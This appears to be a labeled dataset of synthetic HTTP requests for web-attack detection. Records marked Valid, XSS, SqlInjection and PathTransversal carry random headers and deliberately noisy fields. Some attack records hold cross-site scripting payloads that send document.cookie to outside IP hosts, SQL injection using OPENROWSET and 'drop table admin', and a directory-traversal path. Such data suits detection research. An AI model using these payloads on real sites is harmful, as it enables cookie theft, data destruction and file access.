UA-Color: color32
UA-Pixels: 271x8605
Via: 5.9 www.j9mot.gif, 1.4 www.afhis.shtml
Transfer-Encoding: compress
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Forwarded-For: 192.106.81.122
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45846
Start - Id: 17513
class: Valid
GET /ehoiprnxcOcd/urenhsc5Liki9p49n1/noOry/tB@VTPx.V1JYx/sKmNhBpIqRMSLiOTKv/hUAiJ/dMrD7q/tBfcXecE2S8_/s1/nTrA_Y0aUCC/ohzinhesme/Cb.asp? HTTP/1.1
Host: 248.48.99.87
Connection: keep-alive
Accept: text/*;q=0.7, application/zip;q=0.8, audio/basic;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.6, compress;q=0.2
Accept-Language: Taemc9og-e;q=0.9
Cache-Control: only-if-cached
Client-ip: 2.83.129.209
Cookie: cAfntwdaratyii=iy-;Pe=l5];s]ra4 a;ayhjt4o=rolAEpfjmeychzat;2narrh=e9z
Cookie2: $Version="17"
Date: Wed, 26 Oct 05 17:27:51 UTC
ETag: "VfDQeglA-OWCeNU4sa"
Expect: 100-continue
From: bedNezd@9hivlL.de
If-Modified-Since: Mon, 22 Jan 07 10:17:57 GMT
If-Unmodified-Since: Tue, 04 Nov 08 12:07:36 UTC
If-Match: "tUZ7lCso5yqlUB7W4J9"
If-None-Match: "GCQhOAP@uc4lJCOg"
If-Range: "OCKcvAtQoZ5nho0mxs"
Max-Forwards: 1
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: NTLM SW5Fb3Jua1RhVXJzZXRkb3VyYWVTVGVlcnNZdDVwc2s=
Range: 8940-,0923-,5121-
Referer: /urr0nblc/esleie/arln/hnotnpb.zip
TE: trailers,deflate,trailers
Trailer: Date
User-Agent: ogU0-M9O http://www.wir1zeei.cz
UA-CPU: x86
UA-Disp: 3556,2062,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 936x088
Via: 9.5 178.247.106.96, FTP/6.2 www.tNievO.png
Transfer-Encoding: nrluia; cHYioUis=ukstwuh
Upgrade: wys/9.8, dwn/4.4
Warning: 373 146.38.237.78 "npfieGe" 
X-Forwarded-For: 150.228.243.74
X-Serial-Number: 677288661240188705
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17513
Start - Id: 27844
class: Valid
GET /oriylapOac/4McW.XUhcaf1G1lXDFq/t1Aduero6tNbB/iNsd9AGvToyuX5z/3tnvassnm.gif?damgwu=ep&hoc9s2meiebf=riMt&oe4Db=pE5x2U&ine=eXupdateucCA&taweTwx2eMm9hz=4476134&I3oSnesnkThc=i3oUuMHl-B&hce4lrtey=rVuYP7uqD_ HTTP/1.1
Host: www.nuehMci4Ir.org
Connection: keep-alive
Accept: audio/basic;q=0.2, image/*;q=0.8, audio/*;q=0.4
Accept-Charset: iso-10646-ucs-2;q=0.9, shift_jis;q=0.1, windows-1251, windows-1257;q=0.2, iso-8859-8
Accept-Encoding: deflate;q=0.7, deflate, deflate;q=0.2
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 253.99.111.142
Cookie: medea=1696804;rsweqsoe0epO=nic8maEroaWpelo;9atrRhittzndot=Sik;Syde=tebhs;jNdOtu2hej=5TUwindow.openputdn4 9;nYOo3yoyea5=869857202
Cookie2: $Version="12"
Date: Fri, 12 May 06 15:18:56 GMT
ETag: "T7R-PajXniYdaIVIMa"
Expect: 100-continue
From: xalea@r7nedo.fr
If-Modified-Since: Sun, 06 May 07 05:44:28 UTC
If-Unmodified-Since: Sun, 22 Feb 09 11:35:47 GMT
If-Match: "JopLzwIkSQX3VMyv"
If-None-Match: "f2flgk@2dROi23rd"
If-Range: *
Max-Forwards: 797
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: mkd8c naeroilc=pleeis
Authorization: NTLM c3BpeThoYXRoc3JlcTdac2FzNHN0RWVzZWV1NjV0dXVtcm9z
Range: 239-7
Referer: /iGi7/sae9t/ymomnhl.cfm
TE: trailers,chunked
Trailer: Referer
User-Agent: Mozilla/5.0 (Windows; U; Win98 0.9; hs-kp; rv:5.6.0) Gecko/28837037
UA-CPU: x86
UA-Disp: 904,456,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 277x778
Via: aTer/2.3 www.4eeraOs.tiff
Transfer-Encoding: gzip
Upgrade: ais8ee/1.3, tiXl/4.0, eploa/7.6, boptsh/6.4, 0tn/9.0
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 216.94.170.227
X-Serial-Number: 92325368257
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27844
Start - Id: 9308
class: Valid
GET /9TJ1InVhC31/uMP8q@R@rOGVbG.Ra/eaUttaueoc86ea6/ozkWJDcRdWpgOSWy.html?yttei99=3700028&7bznea=aaiid58&lirW7ornRry5et=13277655&2a=F3wmaild&Hdro=4cnllAst&rfblbcin=nh2kliaee9hxn1s&amveAkeaCnt6ee=5698232&ht=jnJWg5J9Id&Elsn7bEdtpd2=2010657680&fp9iui=01151714&uwssrooei0=emIX3iU HTTP/1.0
Host: 245.252.110.43
Connection: iugs
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: yamohuS-eUOesTen, t0psn-iabe, ahoe-m0s;q=0.6
Cache-Control: no-transform
Client-ip: 76.56.79.229
Cookie: yna7c=8740300088;jb4cla=usnGa wrtrYchild;7a8bwHprtaOues=1986789406;ioewnde3nT=67860502;iEeeha3lm=9378008729;sipioied=Qrd0zs
Cookie2: $Version="51"
Date: Thu, 03 Sep 09 19:53:38 GMT
ETag: W/"FkAJ4vKKqht86LkE2C"
Expect: 100-continue
From: sexataI@lgbo5ae.uk
If-Modified-Since: Fri, 16 Nov 07 05:42:01 CET
If-Unmodified-Since: Sat, 21 Jun 08 21:01:09 GMT
If-Match: "iGUa4642nrXPk-ASt-td"
If-None-Match: *
If-Range: Wed, 26 May 04 03:33:36 UTC
Max-Forwards: 3600
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM OVJwbmloc2FmMWNUc2lka0hlYmQwdGtvdHRoSW9vZWhy
Range: 544-,11709-076
Referer: /etalr/isAaa/hrtifo/n3Eir/63gv.bin
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: eh0Uy4ca http://www.t8on.com
UA-CPU: 68000
UA-Disp: 7621,4110,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x0669
Via: 1egm/0.7 www.hlhidnnF.shtml, HTTP/0.0 185.59.88.180:6
Transfer-Encoding: gzip
Upgrade: u0F/4.5, tzae/8.8, r6d/0.0
Warning: 170 83.104.71.61 "wr0hialdc" 
X-Forwarded-For: 156.126.164.181
X-Serial-Number: 8554851
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 9308
Start - Id: 24153
class: Valid
GET /GJ@/htpassconnect/aytb2Z4CHMt1fI/s./AKJVL9.mspx?ncsIr@V@ckNupasswd=rcp5bk&2pitthAnsedG=hnv+h&dd=0674873&waClmcRolra=snt&Ww9itessw3zrz=jautoexecadshstyle%3Bibifcet3i&t6nfynodenasbg=eL%24misa%7Ctsxehfrtcboexec&ntljhaa=98078584&gCFuR1Azps=iframea&Tpianto7oa=t6Etey3q&aogfpw4vexrcu=eie%3Fxboot.iniaYr&scriptr_oWlPj=saiu%25uSephc%3F&nLsari=8teench&ochensutesei=ar&eh1hla=tmpa%27l HTTP/1.0
Host: www.ceb0amt.fr:42
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: st1-it, ee49-geieyIm7, b-ea;q=0.0, iOii4tg-oten;q=0.2
Cache-Control: no-transform
Client-ip: 54.18.159.46
Cookie: TA9t4seSilNer=1260;IB@@iframe8JqjTV=250086;idunionJhWF8=2
Cookie2: $Version="49"
Date: Fri, 04 Dec 09 05:13:23 UTC
ETag: "s4tBYBnxgRfhumtRaIa"
Expect: 100-continue
From: ehlfwDei@ioSehd.biz
If-Modified-Since: Thu, 28 Sep 06 06:12:30 GMT
If-Unmodified-Since: Sat, 15 Aug 09 19:51:06 GMT
If-Match: "R6acHvW_VSu.PgIn0J"
If-None-Match: "BfljSDKUkenHPP5BrRZr"
If-Range: Fri, 24 Feb 06 20:07:40 GMT
Max-Forwards: 6
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: eoczsc itSh=mlee
Authorization: sagzi arhoteu=ahqsel
Range: 392642-8535,09679-
Referer: /gcwsh/t8uetor/rnhmt6mn/agIaj/eadtlgc.asmx
TE: chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 4.1; dv-el; rv:9.8.2) Gecko/45336091
UA-CPU: MIPS
UA-Disp: 3355,078,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9598x0214
Via: 1.8 www.cgtldonT.jpg
Transfer-Encoding: identity
Upgrade: eiii/0.5, 9ndue/3.8, tBtdt/3.0
Warning: 176 www.afsytan0.shtml:89321 "rtelrjklcea6e5" "Fri, 30 Oct 09 01:05:38 CET"
X-Forwarded-For: 91.102.253.43
X-Serial-Number: 14467935951
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24153
Start - Id: 7339
class: Valid
PUT /acM4rUx_wJI-nQY/tt4apjoi/naR3CqDiMMbawuc6w/h0-jxtrkvyTBtN6eC/i0wLjZHbVOC9wBYwS/apez.png? HTTP/1.1
Content-Length: 174
Content-Language: UIracgpr,ta4lbnnh
Content-Encoding: identity
Content-Location: /Ehgn.swf
Content-MD5: c3RwdHlySWFoY3RIZVJ3cA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 02:58:23 GMT
Last-Modified: Sat, 11 Aug 07 09:12:27 UTC
Host: www.w8I3xTia.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, x-mac-ce
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: nhT='j44EIdS'
Client-ip: 18.53.58.226
Cookie: 8aairi=dbwx3w4;THS@wGRUX=13;lkmpna8la5ee9an=5048;ei3=Muon elogerm;ngqereetaoitxhs=x7sipassthruD=8m1sxterm1Usts
Cookie2: $Version="452"
Date: Thu, 26 May 05 11:57:48 CET
ETag: W/"x.1@yW8wIjiCNMwf"
Expect: 100-continue
From: bd1dpemo@srslucfben.ch
If-Modified-Since: Tue, 05 Feb 08 19:59:05 UTC
If-Unmodified-Since: Tue, 07 Aug 07 13:20:29 CET
If-Match: "avXKjxrwiNHn1k.2od"
If-None-Match: *
If-Range: "7vnLUM8pP0SmUYTGCJ"
Max-Forwards: 59
MIME-Version: 6.0
Pragma: c=t2
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: NTLM Y3dwb3RyNVRmb2FkQmRvcm84d3hmbmV0VE00eWFUaG9oYQ==
Range: 0730-,-46
Referer: http://www.xo2aPhdz.net/hmsSDbH/ltweadn.asmx
TE: trailers,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 9.6; r4-sy; rv:8.3.4) Gecko/45461590
UA-CPU: 68000
UA-Disp: 068,389,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1302x7380
Via: FTP/9.1 234.146.152.32, FTP/9.5 www.xtgAib.htm
Transfer-Encoding: zosdLg
Upgrade: 5a1o/5.9, umu/3.5
Warning: 203 227.12.172.4 "glfymariontdS0eiet" "Sat, 14 May 05 05:37:02 GMT"
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 0347000130099147
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tuddibp9tA=ralsi&ich=tntu7updnrbheat9rs&nioenn=rbuDahaG52&mal2rjouftLf=se207raasl&lsvQghoptsfv0V9=lDh0ee7elm&agm5eh=xi&2na:Ti&oaidnrhdyr=eoal1yagqd&edetraSTonthi=tXJQwI-_

End - Id: 7339
Start - Id: 47922
class: XSS
GET /eas/wEW/3pLPBZ78S/tonei4w7ml/Nie-JexecCBstdinOnqCgW.mspx?oteesStS5e=%3Cimg++++src++%3D+%22+mocha%3A%5Bwindow.open%28%27http%3A%2F%2F169.91.236.168%2Fanil.asp%27%2Bdocument.cookie%29%3B%5D++++++%22+++%3E&ixuagmyd=lAEaeota&bvdnlotwaQUckf3=e%40VJJ9Ps HTTP/1.0
Host: www.d02cibp.biz
Connection: pmiW5ne
Accept: image/png, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity
Accept-Language: p-esnioEn, htect-yM;q=0.6, Djsliu-o;q=0.8, raro2e-2N4hte;q=0.9, ML-Uom;q=0.0
Cache-Control: max-age=1
Client-ip: 249.54.30.10
Cookie: ehrneiekgy=hgiise;IULVDFwZN5V=99872;Mqti=56;nctmpBZzs7winntwhere=25889;includeCMcopyZinsertPm_ET=7rnoNmr7;aexb92ebkeI=61372
Cookie2: $Version="20"
Date: Tue, 07 Feb 06 22:28:29 CET
ETag: W/"_.0C6nefcSBlQWvp"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: dtlie@titeAadsjb.com
If-Modified-Since: Fri, 21 Nov 08 07:20:30 CET
If-Unmodified-Since: Thu, 22 Dec 05 19:10:49 GMT
If-Match: "gVsdG2zjZqIm65I6UDI"
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: *
Max-Forwards: 824
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: Digest username="tsonE"
Range: 16-10857
Referer: http://www.xtnaer.it/kqdt6.swf
TE: gzip,deflate;q=0.2,trailers
Trailer: Via
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 2.5; rs-ic; rv:6.8.1) Gecko/47819209
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.7 223.182.232.86, 4.8 www.2u4r0t.jpg, HTTP/7.7 61.176.186.103
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 198.152.150.100
X-Serial-Number: 03181480810
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47922
Start - Id: 46794
class: XSS
PUT /6qZcKzIiH/F2/ardoboxvatn/piETdkainno7l/agbwkrtDb.GfwVywpW.html? HTTP/1.1
Content-Length: 405
Content-Language: ii,wemirj,Hmeuaidp
Content-Encoding: compress
Content-Location: http://bveaunta.com/o96e/Tsel49o/9uleqsAe.aspx
Content-MD5: Y2RsazdtaGJhdGhFcnBzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Dec 06 14:02:49 UTC
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: 37.66.97.210:80
Connection: 9etH
Accept: */*;q=0.9
Accept-Charset: utf-7, x-mac-arabic;q=0.6, windows-1255, x-mac-hebrew;q=0.2
Accept-Encoding: 
Accept-Language: y-i, 15bs-rarlel;q=0.1, qcs3ti-Rsz;q=0.6
Cache-Control: only-if-cached
Client-ip: 12.158.214.61
Cookie: lywtVen=8
Cookie2: $Version="17"
Date: Tue, 20 Sep 05 22:42:15 CET
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: Ksasyns
From: fnwte@lpuewgs.de
If-Modified-Since: Mon, 22 Nov 04 18:32:15 CET
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: *
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 694
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM ZGVnN2FhYWR1eGxhZWRlZWJvYVRhc29uZW90YWllazNyMA==
Range: 15-86
Referer: http://OrrteMz.de/ab50cex/p0htuj/52flon/msofEeR.jsp
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: mnem6tE (iGxQcu; cJGggI9FHU; nl6xWYe@m; aOi_RD-9)
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 8.7 181.103.148.235:78857, doan/7.5 www.iarnr.jpeg, HTTP/9.4 www.hi48t.tiff
Transfer-Encoding: nBooad; 5mBetre=oph03ye
Upgrade: fbr/7.3
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lstu=tinserteshutdowna2bainsert4n%yvw&T4tG8c4whereBj=s38p&Askaciyt=imo&XKtyHi=5022&adewiaqktnnpd=9746996509&bihl1ilcaenvd42=chva0&nlciofn=<!-- -- --><script   >[window.open('http://249.223.67.222/se.asmx'+document.cookie);]</script><!-- -- -->&oaaoo65tiXeta=cttonol&4LZzbgsoundPMI=uOxUu8&arrssaxu=i30Aizcpcn&@BC_IJu63rcpOM=amtp&ssI2zasno=796454&eltruru=nMIc

End - Id: 46794
Start - Id: 19935
class: Valid
GET /iWn8PxXQel/em6sn8AieuSsanf/ckevaljvP/sMwL833RC_cQ5ErxOUOf/iOupae/LARwhereWuSfZ/Ri8rel3ryhed7np/gxuoueihv/ettitevdreGg/19fthC4fe.css?sI=pDqEjx3nzCg&dnnnosuntumr=8HQ9S&xoa9o0gm=ceo0Hrpirteasndf6&mgvuyhbuEoad=451149163 HTTP/1.0
Host: 134.166.193.191:3316
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.3, windows-1251;q=0.1, big5;q=0.7, macintosh
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 19.249.226.166
Cookie: lcnarpn6so9s6=;>open[$z i3n<bgeecho;Ywmvro=onom1tcotoestTtle
Cookie2: $Version="553"
Date: Sun, 07 May 06 03:37:21 CET
ETag: "1pnf48Yn1vNngvrfmV-"
Expect: 100-continue
From: eeruearo@0jdeseld5.de
If-Modified-Since: Tue, 09 Mar 10 03:56:08 GMT
If-Unmodified-Since: Fri, 01 Dec 06 19:10:38 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Oct 07 18:27:38 GMT
Max-Forwards: 55
MIME-Version: 1.1
Pragma: uhu=tsuns
Proxy-Authorization: Basic dWhyZXJwcmM6NHNubm00ZQ==
Authorization: Basic dGFvYzppbGd0
Range: -938127,36370-,-5
Referer: /pannrkb/trOft/5hfr.jsp
TE: trailers,deflate;q=0.5
Trailer: Upgrade
User-Agent: nileeyBdSs (skB4fAMkPl; szE01c; et0xW0G; s4vqm5l; 118KR.w-I)
UA-CPU: Sparc
UA-Disp: 611,1277,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 756x2638
Via: 8.8 136.38.154.105, FTP/3.2 www.mdrlWlm.tiff
Transfer-Encoding: nineu
Upgrade: edt/2.6, Oofaeg/8.4, xttqn/2.8, loa/0.5
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19935
Start - Id: 35287
class: SqlInjection
GET /hTl8HazAT4pmXmdqJen/rcbehsyl/sc/nrMD2H8PYpPYY-gkJDA/aFs6_Orw7IQ20/nwkiEhKNXP2NSQfL7.htm?na=328077&d1enlehv=%3B++++select+*+++++from+OPENROWSET%28%27SQLoledb%27%2C%27uid%3Dii%3Bpwd%3DeEsstohrud%3BNetwork%3DDBMSSOCN%3BAddress%3D10.115.5.32%2C50719%3B%27%2C%27select+++*++from+++it2nytjhts%27++++%29&bandtTBXxQpg=mn&-3Uxs6sg=sNn9o8aaA&eMaaccf=eEGwlh%40PadK HTTP/1.0
Host: 36.5.209.140:80
Connection: rNptdm
Accept: audio/*, audio/basic;q=0.3
Accept-Charset: x-mac-roman;q=0.5, macintosh, hz-gb-2312, utf-8
Accept-Encoding: compress;q=0.3, gzip;q=0.8, gzip, identity;q=0.7, deflate;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 117.242.130.149
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Sat, 23 Apr 05 02:15:15 UTC
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: tomlS4
From: g1swIsn@rorentof.uk
If-Modified-Since: Tue, 11 Dec 07 21:04:39 CET
If-Unmodified-Since: Thu, 23 Jun 05 05:11:49 CET
If-Match: *
If-None-Match: "0oEmttD7D49uyqyTF3Z"
If-Range: Fri, 27 Feb 09 22:12:19 CET
Max-Forwards: 48
MIME-Version: 8.3
Pragma: O=xEupnsst
Proxy-Authorization: Digest opaque="pYar"
Authorization: NTLM cnRydTI3cWhkZXByUm51c3R3dG5yZXRucm5pbW41cm9OZ2Q1cXhvU3R5ZWs=
Range: 930-456,2355-
Referer: http://www.ditfgae.com/9ebeaen.conf
TE: gzip;q=0.4,chunked;q=0.1
Trailer: Warning
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 8.6; ii-ch; rv:3.5.3) Gecko/88369474
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: HTTP/4.5 49.34.229.149
Transfer-Encoding: saih3d; nnlSm=0canoe
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35287
Start - Id: 25385
class: Valid
GET /_.T97x-8iWZqsoP/ar.group by.swf?L1@access_logyoptIk=y&awdokdKusaihsu=434513&iyevltnysf2=877&he=%3C&nmipeuuteeeer=3120&Apwobjectk7xt1LZv=LayocopyatHfromn5+ot HTTP/1.0
Host: www.rntrpee.st
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 99.191.189.189
Cookie: osOhortejgns=7668675;rzaiheoot1i=ndMtdtinrhzb~window.opendba
Cookie2: $Version="4"
Date: Sat, 19 Dec 09 10:29:53 GMT
ETag: W/"Z2pOfs9CyNAb1oA"
Expect: 100-continue
From: rrhs@lfj0yeitrn.cz
If-Modified-Since: Sat, 07 Jan 06 20:33:54 UTC
If-Unmodified-Since: Sat, 05 Mar 05 09:41:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Mar 05 22:15:38 GMT
Max-Forwards: 73
MIME-Version: 3.1
Pragma: 94aO=tec4t
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: Basic YWFkbmM6c3dhcGV0cmQ=
Range: 047-,776-
Referer: /1Eliso/qae2besa/e2Sl9q/eohe.png
TE: trailers,trailers
Trailer: Upgrade
User-Agent: oBm7qL1h http://www.8N6add.fr
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: gzip
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 361 189.181.68.53 "fIjyiokT66aez" "Tue, 06 Apr 10 13:42:10 UTC"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 927015568705209514
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25385
Start - Id: 35416
class: SqlInjection
GET /telnetrid/twx/pformnGQF9u8i/tlLilVWTPknXreg44/ChPZ_Q1/jhcatO_LbQp..tiff?5s5Terh=imgsoa%3DFlynull&elfOresswhvrar=dUk8dd&tr=ppN&smeltxdetkwa=971335938&7hfel=5&select98orTjUHymeta=297151417&Ln=w5agroup+bynn9divnform&dstngsp=gr4u&oee2csrbtLglml=it5i&ovxsCtnnela=%27%3B++++drop+++table++++admin&vISAe8=98&lPsmZxaF=ttmr0ashutdownyEos%3C+%3B HTTP/1.1
Host: www.n8eyi.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: utf-7;q=0.2
Accept-Encoding: *
Accept-Language: b3mee-ewidMs;q=0.1, Qnvtomo-rio, qcr-Almd1
Cache-Control: max-age=2521
Client-ip: 67.105.71.5
Cookie: replaceCyMrcpbYJ=srta7ttduurten;meetNmS9dssb=nskp4qdq;RyPmhTMbNxI6=5013294757;hxtdloxyeaG=hD3eB6.
Cookie2: $Version="22"
Date: Tue, 19 Aug 08 14:29:59 CET
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 0tsatea
From: meCo6@c0Onn.it
If-Modified-Since: Mon, 22 Aug 05 17:05:58 CET
If-Unmodified-Since: Thu, 25 Feb 10 24:32:53 GMT
If-Match: "S-21pHT6TPzIb-N"
If-None-Match: "kIopZ_T@-PF40pP-e"
If-Range: Tue, 06 Mar 07 23:10:38 UTC
Max-Forwards: 53
MIME-Version: 5.1
Pragma: et=Hiyii65
Proxy-Authorization: Digest username="tdmza"
Authorization: NTLM dWhhd2l1ZXhhN3VoZUNpeWUxbmllcGdhblRybm5hb3RvdXJwaWxTcm50c3Rr
Range: 12-28
Referer: /ntoxn/htrn/oysrgpr/2otpw7.pdf
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/1.8 (compatible; Konqueror/2.0; Linux i586; rEme; ysolwOrcvh)
UA-CPU: Sparc
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: FTP/8.5 www.TeDamv.css
Transfer-Encoding: compress
Upgrade: geD5/1.4, sat/3.0, otQ/7.5, aoiw/6.4
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 281340124
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35416
Start - Id: 34055
class: Valid
PUT /rbnN.DhEd_Q/Ojcw/UnePfPaccess_logzaccess_logWJJx/fgcZT_vBMrdm8pkt.html? HTTP/1.0
Content-Length: 87
Content-Language: tdu,1tCvoma
Content-Encoding: gzip
Content-Location: /sbaue/Sjoo.png
Content-MD5: UlNyaXUxdHJpbGdsb3licA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Sep 07 13:19:10 GMT
Last-Modified: Sun, 30 Apr 06 14:01:26 GMT
Host: 191.19.128.57
Connection: close
Accept: video/quicktime;q=0.8, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, gzip;q=0.7, gzip;q=0.7, identity;q=0.3, gzip
Accept-Language: iiiHsII-qsdeE1;q=0.8
Cache-Control: max-stale=11442
Client-ip: 183.39.50.79
Cookie: atfsnusrtriii=579;0absselect@@e.OuM=459;lvokgiseobcys=yreheftlTisfmtl;insert2A.YhRy2=asiccTTyr;aRwy5etc4=62025;dfri=010
Cookie2: $Version="3"
Date: Sun, 03 Feb 08 12:52:17 UTC
ETag: "S9OJCWsXznZpHrXG"
Expect: tn8o
From: a66ero@negstqete.net
If-Modified-Since: Fri, 26 Nov 04 13:44:51 CET
If-Unmodified-Since: Thu, 30 Dec 04 03:57:59 GMT
If-Match: "P3P9hLXdr18TZhDc"
If-None-Match: "tFJxzeFTpnBWYlt"
If-Range: *
Max-Forwards: 25
MIME-Version: 8.9
Pragma: 2uje=ebltOheo
Proxy-Authorization: Digest qop=auth
Authorization: NTLM c3B4YW5vZGFtZW5IaXNxMjFkbDJhZVRhZHhkaXBmSG8=
Range: 821815-50,1-
Referer: /tih3/mlboavI.dll
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/1.3 (compatible; Konqueror/9.7; Linux i586; ttriinawc; iqxynxmfse; nraeoemwdc)
UA-CPU: 68000
UA-Disp: 2533,0787,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 682x2942
Via: 3.1 59.32.116.51:7
Transfer-Encoding: compress
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 839 136.145.234.240:03 "8eru4Saovlliuyd" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 14296843524
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lea6mwb=giUKfFwgBx&3qunionh4vXO=Laenii&Roh=6otys&ogd5isyemNh=cnenVnboxdidyb<&PJZ2= ts

End - Id: 34055
Start - Id: 45521
class: PathTransversal
GET /TadlhWbtsosisiJnygor/aRnl@bA0J/inivsere6xse/e6uSH7IKKMXM9G/erFH6ei/apZyXXVShUBxz.jsp?6ods6Geqentcel=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fse%2Ficrees%2Freeseltime%2Fas.nsf&tuasegcsH=rridt&DU1C-F=%3Bni HTTP/1.1
Host: www.icn4.fr
Connection: 7dmetr
Accept: application/postscript;q=0.1
Accept-Charset: x-mac-turkish, x-mac-turkish;q=0.1
Accept-Encoding: compress;q=0.6
